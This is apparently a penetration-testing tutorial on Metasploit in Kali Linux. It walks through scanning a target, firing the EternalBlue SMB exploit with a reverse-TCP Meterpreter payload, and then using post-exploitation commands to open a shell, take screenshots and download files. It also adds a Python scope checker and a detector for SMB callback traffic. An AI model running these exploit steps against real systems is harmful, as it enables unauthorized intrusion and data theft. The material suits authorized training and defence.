# Metasploit on Kali Linux

## Metasploit on Kali Linux: A Step-by-Step Tutorial

**Disclaimer:** This tutorial is intended for educational purposes **only**. Always ensure you have explicit permission to perform penetration testing on any network or system. Unauthorized access to computer systems is illegal and unethical.

***

### Table of Contents

1. Introduction to Metasploit
2. Setting Up the Environment
3. Starting Metasploit Framework
4. Basic Commands in Metasploit
5. Scanning and Enumerating Targets
6. Selecting and Configuring Exploits
7. Choosing and Configuring Payloads
8. Executing the Exploit
9. Post-Exploitation with Meterpreter
10. Closing the Session and Exiting Metasploit
11. Best Practices and Ethical Considerations

***

### 1. Introduction to Metasploit

Metasploit Framework is a powerful tool used by cybersecurity professionals for penetration testing and vulnerability assessments. It provides a suite of tools for simulating attacks on networks and systems to identify security weaknesses.

### 2. Setting Up the Environment

#### Prerequisites

* **Kali Linux** installed on your machine (bare-metal, virtual machine, or live boot).
* **Basic understanding** of networking and command-line interface.

#### Updating Kali Linux

Before starting, ensure your system is up to date:

```bash
sudo apt update && sudo apt upgrade -y
```

### 3. Starting Metasploit Framework

Metasploit comes pre-installed on Kali Linux.

To start the Metasploit console:

1. **Open a terminal window.**
2. **Start the PostgreSQL database service** (required for Metasploit's database-backed commands such as `db_nmap`, `hosts`, and `services`):

   ```bash
   sudo service postgresql start
   ```
3. **Start the Metasploit console:**

   ```bash
   sudo msfconsole
   ```

*You should see the Metasploit banner and the `msf>` prompt.*

You can also launch Metasploit from the Kali Linux application menu.

### 4. Basic Commands in Metasploit

Familiarize yourself with some basic commands:

* **`help`**: Displays the help menu with a list of commands.

  ```bash
  msf> help
  ```
* **`version`**: Shows the current version of Metasploit.

  ```bash
  msf> version
  ```
* **`search`**: Searches the module database (exploits, payloads, and other modules) by keyword.

  ```bash
  msf> search smb
  ```
* **`use`**: Selects a module to use.

  ```bash
  msf> use exploit/windows/smb/ms17_010_eternalblue
  ```
* **`show options`**: Displays options for the selected module.

  ```bash
  msf> show options
  ```

### 5. Scanning and Enumerating Targets

Before exploiting, gather information about the target.

#### Using Nmap within Metasploit

1. **Run Nmap scan:**

   ```bash
   msf> db_nmap -sV -O 192.168.1.10
   ```

   *Replace `192.168.1.10` with the target IP address.*
2. **View the scanned hosts:**

   ```bash
   msf> hosts
   ```
3. **List open services and ports:**

   ```bash
   msf> services
   ```

### 6. Selecting and Configuring Exploits

#### Searching for Exploits

1. **Use the `search` command with relevant keywords:**

   ```bash
   msf> search type:exploit name:smb
   ```

#### Selecting an Exploit

1. **Choose an exploit module:**

   ```bash
   msf> use exploit/windows/smb/ms17_010_eternalblue
   ```
2. **View exploit options:**

   ```bash
   msf> show options
   ```

#### Setting Exploit Options

1. **Set the target IP address:**

   ```bash
   msf> set RHOSTS 192.168.1.10
   ```
2. **Confirm the options are set:**

   ```bash
   msf> show options
   ```
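Both `db_nmap` in section 5 and `set RHOSTS` here take a target address, so this is the point to confirm that address is covered by the written authorization. The following is an added example, not part of the original tutorial or of Metasploit: the scope lists and the function names `parse_targets` and `check_scope` are assumptions, and anything that is not a plain IP or CIDR is refused rather than guessed at.

```python
import ipaddress

# Constructed engagement scope (assumption): networks named in the written
# authorization, plus hosts the client explicitly excluded from testing.
AUTHORIZED = ["192.168.1.0/24"]
EXCLUDED = ["192.168.1.1", "192.168.1.254"]


def parse_targets(spec):
    """Turn a space-separated list of IPs/CIDRs into network objects.

    Hostnames, dash ranges and file references raise ValueError, so an
    unparseable target is rejected instead of being interpreted loosely.
    """
    if not spec.strip():
        raise ValueError("empty target specification")
    return [ipaddress.ip_network(item, strict=False) for item in spec.split()]


def check_scope(spec, authorized=AUTHORIZED, excluded=EXCLUDED):
    """Return (ok, reasons); ok is True only if every target is in scope."""
    allowed = [ipaddress.ip_network(n) for n in authorized]
    denied = [ipaddress.ip_network(n) for n in excluded]
    try:
        targets = parse_targets(spec)
    except ValueError as exc:
        return False, [f"unparseable target: {exc}"]
    reasons = []
    for net in targets:
        # Every address of the target must sit inside an authorized network.
        if not any(net.version == a.version and net.subnet_of(a) for a in allowed):
            reasons.append(f"{net} is outside the authorized networks")
        # A range that merely touches an excluded host is refused as well.
        for d in denied:
            if net.version == d.version and net.overlaps(d):
                reasons.append(f"{net} includes excluded host {d}")
    return (not reasons), reasons


if __name__ == "__main__":
    for spec in ["192.168.1.10", "192.168.1.0/24", "192.168.1.10 10.0.0.5", "fileserver"]:
        ok, reasons = check_scope(spec)
        print(f"{spec!r}: {'in scope' if ok else 'REFUSE'} {reasons}")
```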

### 7. Choosing and Configuring Payloads

#### Listing Available Payloads

1. **Show compatible payloads:**

   ```bash
   msf> show payloads
   ```

#### Selecting a Payload

1. **Choose a payload (e.g., reverse TCP shell):**

   ```bash
   msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
   ```
2. **Set the local host IP (your machine's IP):**

   ```bash
   msf> set LHOST 192.168.1.5
   ```

   *Replace `192.168.1.5` with your Kali Linux IP address.*
3. **(Optional) Set the local port:**

   ```bash
   msf> set LPORT 4444
   ```

### 8. Executing the Exploit

1. **Run the exploit:**

   ```bash
   msf> exploit
   ```

   *Metasploit will attempt to exploit the target and establish a Meterpreter session.*
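From the defender's side, the sequence in sections 6 to 8 leaves a recognizable network pattern: a peer reaches a host on SMB (445) and that host then opens a connection back to the same peer. The following is an added example, not part of the original tutorial: the log format, the sample records and the names `parse` and `find_callbacks` are constructed for illustration, and the check does not depend on port 4444 because `LPORT` is configurable.

```python
from collections import namedtuple

Conn = namedtuple("Conn", "ts src sport dst dport")

# Constructed flow records (not real traffic): epoch seconds, source IP and
# port, destination IP and port, one TCP connection attempt per line.
SAMPLE_LOG = """\
1700000000 192.168.1.5 51514 192.168.1.10 445
1700000004 192.168.1.10 49712 192.168.1.5 4444
1700000010 192.168.1.20 50211 192.168.1.10 445
1700000030 192.168.1.10 49720 192.168.1.30 443
1700000900 192.168.1.10 49733 192.168.1.20 8080
"""


def parse(log):
    """Parse whitespace-separated flow lines, skipping malformed ones."""
    conns = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        try:
            conns.append(Conn(int(parts[0]), parts[1], int(parts[2]),
                              parts[3], int(parts[4])))
        except ValueError:
            continue
    return sorted(conns)  # namedtuples sort by timestamp first


def find_callbacks(conns, service_port=445, window=60):
    """Flag hosts that connect back to a peer within `window` seconds of
    that peer reaching them on service_port. Returns a list of
    (host, peer, callback_port, seconds_after_inbound) tuples."""
    alerts = []
    recent = {}  # (server, client) -> time of last inbound service connection
    for c in conns:
        if c.dport == service_port:
            recent[(c.dst, c.src)] = c.ts
        seen = recent.get((c.src, c.dst))
        if seen is not None and 0 <= c.ts - seen <= window:
            alerts.append((c.src, c.dst, c.dport, c.ts - seen))
    return alerts
```

Servers that legitimately exchange SMB traffic with each other can also match, so a hit is a lead to investigate; tune `window` and add an allowlist for the environment.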

### 9. Post-Exploitation with Meterpreter

Once a session is established, you can interact with the target system.

#### Basic Meterpreter Commands

* **`sysinfo`**: Displays system information.

  ```bash
  meterpreter> sysinfo
  ```
* **`getuid`**: Shows the user account the session is running as.

  ```bash
  meterpreter> getuid
  ```
* **`shell`**: Drops into a shell on the target system.

  ```bash
  meterpreter> shell
  ```
* **`screenshot`**: Takes a screenshot of the target desktop.

  ```bash
  meterpreter> screenshot
  ```
* **`download`**: Downloads a file from the target system.

  ```bash
  meterpreter> download C:\\path\\to\\file.txt
  ```

#### Exiting Meterpreter

* **`exit`**: Closes the Meterpreter session.

  ```bash
  meterpreter> exit
  ```

### 10. Closing the Session and Exiting Metasploit

1. **List active sessions:**

   ```bash
   msf> sessions -l
   ```
2. **Interact with a session:**

   ```bash
   msf> sessions -i [session_id]
   ```
3. **Close a session:**

   ```bash
   msf> sessions -k [session_id]
   ```
4. **Exit Metasploit:**

   ```bash
   msf> exit
   ```

### 11. Best Practices and Ethical Considerations

* **Legal Authorization**: Always obtain written permission before performing any penetration testing.
* **Ethical Responsibility**: Use Metasploit to improve security, not to exploit vulnerabilities for malicious purposes.
* **Confidentiality**: Keep any sensitive data obtained during testing confidential.
* **Reporting**: Provide detailed reports of your findings to the appropriate parties to help remediate vulnerabilities.
* **Continuous Learning**: Stay updated with the latest security trends and Metasploit modules.

***

Note: Always remember the importance of legality and ethics in cybersecurity work. Use these skills responsibly to contribute to a safer digital environment.
